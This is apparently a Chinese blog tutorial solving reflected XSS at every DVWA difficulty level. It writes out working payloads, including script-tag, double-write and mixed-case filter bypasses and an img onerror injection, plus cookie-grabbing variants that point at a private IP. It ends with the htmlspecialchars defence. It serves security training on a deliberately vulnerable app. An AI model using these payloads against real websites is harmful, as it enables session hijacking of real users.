DVWA-XSS(Reflected) 全级别教程

XSS(Reflected)

Low等级

查看源码
在这里插入图片描述

可以看到,代码直接引用了name参数,并没有任何的过滤与检查,存在明显的XSS漏洞。
输入<script>alert(/左小舟/)</script>,成功弹框
在这里插入图片描述
在这里插入图片描述

获取cookie

在这里插入图片描述

<script>alert( 'http://192.168.0.107/cookie/?cookie='+document.cookie)</script>,弹窗成功
在这里插入图片描述在这里插入图片描述

Medium等级

查看源码

在这里插入图片描述

使用str_replace函数将输入中的

利用双写绕过

<sc<script>ript>alert(/zzz/)</script>,成功弹框
在这里插入图片描述

获取cookie

<sc<script>ript>alert('zwy-http:// 192.168.0.107/cookie/?cookie='+document.cookie)</script>,成功弹框

在这里插入图片描述
在这里插入图片描述

大小写混淆绕过

<ScRipt>alert(/zzz/)</script>,成功弹框
在这里插入图片描述

获取cookie

在这里插入图片描述

<ScRipt>alert('http:// 192.168.0.107/cookie/?cookie='+document.cookie)</script>,成功弹框

在这里插入图片描述

High等级

查看源码

在这里插入图片描述

preg_replace() 函数用于正则表达式的搜索和替换,这使得双写绕过、大小写混淆绕过(正则表达式中i表示不区分大小写)不再有效。
通过img、body等标签的事件或者iframe等标签的src注入恶意的js代码。
输入<img src=1 onerror=alert(/zzz/)>,成功弹框

在这里插入图片描述

输入<img src=1 onerror=alert('http://192.168.0.107/cookie/?cookie='+document.cookie)>,成功弹框

在这里插入图片描述

Impossible等级

查看源码

在这里插入图片描述

可以看到,Impossible级别的代码使用htmlspecialchars函数把预定义的字符&、”、 ’、<、>转换为HTML实体,防止浏览器将其作为HTML元素。

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Web Security Loop

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值